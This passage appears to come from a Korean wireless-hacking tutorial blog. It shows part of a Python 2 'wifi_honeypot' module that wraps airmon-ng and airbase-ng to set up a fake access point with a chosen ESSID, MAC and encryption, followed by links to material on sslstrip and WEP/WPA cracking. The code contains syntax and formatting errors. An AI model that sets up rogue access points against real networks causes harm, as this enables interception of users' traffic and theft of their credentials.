com[0:4] =='help': help.help() wifi_honeypot() elif com[0:4] =='back': pass elif com[0:12] =='show options': print "" print "Options\t\t Value\t\t\t\t RQ\t Description" print "---------\t--------------\t\t\t----\t--------------" print "interface\t"+options[0]+"\t\t\t\tyes\tWireless Interface Name" print "essid\t\t"+options[1]+"\t\t\t\tyes\tFakeAP Essid" print "channel\t\t"+options[2]+"\t\t\t\tyes\tFakeAP Channel" print "mac\t\t"+options[3]+"\t\tyes\tFakeAP Mac Address" print "output\t\t"+options[4]+"\t\tyes\tLog File Location" print "mon\t\t"+options[5]+"\t\t\t\tyes\tMonitor Mod(default)" print "encrypt\t\t"+options[6]+"\t\t\t\tyes\tType Of Encryptions" print "\n" print "Numbers\t\t Encryptions" print "-------\t\t--------------" print "1\t\t Unencrypted" print "2\t\t wep" print "3\t\t wpa" print "4\t\t wpa2" print "" wifi_honeypot() /* 옵션의 파싱작업 부분 elif com[0:3] == 'run': comm1= "xterm -e airbase-ng -a %s -c %s --essid %s %s > %s &" % (options[3], options[2], options[1], options[5], options[4]) # comm2= "xterm -e airbase-ng -a %s -c %d --essid %s -W 1 %s > %s &" % str(options[3], options[2], options[1], options[5], options[4]) comm2= "xterm -e airbase-ng -a %s -c %s --essid %s %s > %s &" % (options[3], options[2], options[1], options[5], options[4]) comm3= "xterm -e airbase-ng -a %s -c %d --essid %s -W 1 -z 2 %s > %s &" % str(options[3], options[2], options[1], options[5], options[4]) comm4= "xterm -e airbase-ng -a %s -c %d --essid %s -W 1 -Z 4 %s > %s &" % str(options[3], options[2], options[1], options[5], options[4]) monit_mod_start= "airmon-ng start %s" % str(options[1]) print(wcolors.color.GREEN+"[*]Enable monitor mod on your interface [%s] ..."+wcolors.color.ENDC)% (options[0]), subprocess.Popen(monit_mod_start, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() print(wcolors.color.GREEN+" [OK]"+wcolors.color.ENDC) print(wcolors.color.GREEN+"[*]Creating Fake Access Point ..."+wcolors.color.ENDC), if options[6]==1: os.system(comm1) elif options[6]==2: os.system(comm2) elif options[6]==3: os.system(comm3) elif options[6]==4: os.system(comm4) else: print(wcolors.color.RED+"[!]Error : Encryption ID not Found!"+wcolors.color.ENDC) pass sleep(2) print(wcolors.color.GREEN+" [OK]"+wcolors.color.ENDC) wifi_honeypot() elif com[0:4]=='stop': os.system("killall xterm") os.system("killall airbase-ng") wifi_honeypot() else: print "Wrong Command => ", com wifi_honeypot() except(KeyboardInterrupt): print(wcolors.color.RED + "\n[*] (Ctrl + C ) Detected, Module Exit" + wcolors.color.ENDC) |
[참고] 윈도우에서 무선 해킹하기
http://www.youtube.com/watch?v=CK99BpKVgCE
Common View for WIFI + Aircrack-ng GUI
WEP/WPA/WPA2
[참고] 유투브 동영상 검색
- wifi hacking
- ssltrip
- soft AP
- airbase-ng
'Learning > └◆Wireless Hacking' 카테고리의 다른 글
| 01. reaver를 통한 Brutus Attack (0) | 2017.02.14 |
|---|---|
| WPA2 Key Cracking (0) | 2017.02.01 |
| WPA Key Cracking (0) | 2017.02.01 |
| WEP Password Cracking (0) | 2017.02.01 |